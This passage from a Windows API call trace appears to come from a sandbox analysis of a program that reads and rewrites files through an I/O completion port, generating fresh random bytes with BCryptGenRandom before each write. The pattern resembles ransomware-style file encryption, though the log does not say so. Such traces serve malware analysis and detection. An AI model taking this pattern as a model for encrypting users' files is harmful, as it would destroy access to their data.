_Size=0x4) returned 0x1fa2ed8 [0152.010] free (_Block=0x1fa91d0) [0152.010] free (_Block=0x1fa2ed8) [0152.010] free (_Block=0x1fa90b8) [0152.010] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.010] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0152.016] CloseHandle (hObject=0x338) returned 1 [0152.016] free (_Block=0x3f70048) [0152.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0152.022] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x6e74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0152.031] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0153.814] CloseHandle (hObject=0x170) returned 1 [0153.814] free (_Block=0x3df0008) [0153.814] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0153.835] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0xa410, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0153.835] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0153.850] CloseHandle (hObject=0x3cc) returned 1 [0153.850] free (_Block=0x3ef0008) [0153.850] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0153.867] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x92e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0153.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0153.881] ReadFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0xa4e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0153.882] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.446] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0173.447] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0173.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.456] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0173.459] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.459] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.459] free (_Block=0x3e305b8) [0173.459] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.459] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.460] free (_Block=0x1fa91d0) [0173.460] free (_Block=0x1fa2ed8) [0173.460] free (_Block=0x1fa90b8) [0173.460] WriteFile (in: hFile=0x308, lpBuffer=0x3fb00ec, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 0x0 [0173.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.474] CloseHandle (hObject=0x2a8) returned 1 [0173.474] free (_Block=0x3ef0008) [0173.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.483] CloseHandle (hObject=0x338) returned 1 [0173.483] free (_Block=0x3f70048) [0173.483] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.489] CloseHandle (hObject=0x308) returned 1 [0173.489] free (_Block=0x3fb00b8) [0173.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.490] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xa350, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.490] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.500] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0173.500] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0173.501] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.501] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.501] free (_Block=0x3e305b8) [0173.501] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.501] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.501] free (_Block=0x1fa91d0) [0173.501] free (_Block=0x1fa2ed8) [0173.501] free (_Block=0x1fa90b8) [0173.501] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0173.503] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.523] CloseHandle (hObject=0xec) returned 1 [0173.523] free (_Block=0x3e70008) [0173.662] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.673] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0173.673] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.673] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0173.674] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.674] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.674] free (_Block=0x3e305b8) [0173.674] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.674] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.674] free (_Block=0x1fa91d0) [0173.674] free (_Block=0x1fa2ed8) [0173.674] free (_Block=0x1fa90b8) [0173.674] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0173.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0173.688] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.688] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0173.688] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.688] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.688] free (_Block=0x3e305b8) [0173.688] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.689] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.689] free (_Block=0x1fa91d0) [0173.689] free (_Block=0x1fa2ed8) [0173.689] free (_Block=0x1fa90b8) [0173.689] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0173.689] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.699] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.706] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x18f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.717] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.725] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.726] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0173.726] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.726] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0173.727] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.727] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.727] free (_Block=0x3e305b8) [0173.727] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.727] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.727] free (_Block=0x1fa91d0) [0173.727] free (_Block=0x1fa2ed8) [0173.727] free (_Block=0x1fa90b8) [0173.727] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0173.727] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0173.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0173.735] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.735] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.735] free (_Block=0x3e305b8) [0173.735] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.735] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.735] free (_Block=0x1fa91d0) [0173.735] free (_Block=0x1fa2ed8) [0173.735] free (_Block=0x1fa90b8) [0173.736] WriteFile (in: hFile=0x338, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.752] CloseHandle (hObject=0x338) returned 1 [0173.753] free (_Block=0x3ef0008) [0173.753] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.762] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0173.762] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.762] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0173.762] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.762] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.763] free (_Block=0x3e305b8) [0173.763] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.763] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.763] free (_Block=0x1fa91d0) [0173.763] free (_Block=0x1fa2ed8) [0173.763] free (_Block=0x1fa90b8) [0173.763] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.764] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1db0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.764] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.764] CloseHandle (hObject=0x308) returned 1 [0173.765] free (_Block=0x3df0008) [0173.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.786] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.805] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xae4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0173.805] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.807] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x540, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.807] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.877] CloseHandle (hObject=0x170) returned 1 [0173.877] free (_Block=0x3d70450) [0173.877] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.882] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x6cc4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0173.891] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.914] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x36b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.921] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x3300, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.927] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x7a80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0173.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.935] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.935] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0173.935] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0173.936] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.936] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.936] free (_Block=0x3e305b8) [0173.936] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.936] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.936] free (_Block=0x1fa91d0) [0173.936] free (_Block=0x1fa2ed8) [0173.936] free (_Block=0x1fa90b8) [0173.936] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.937] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.942] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: 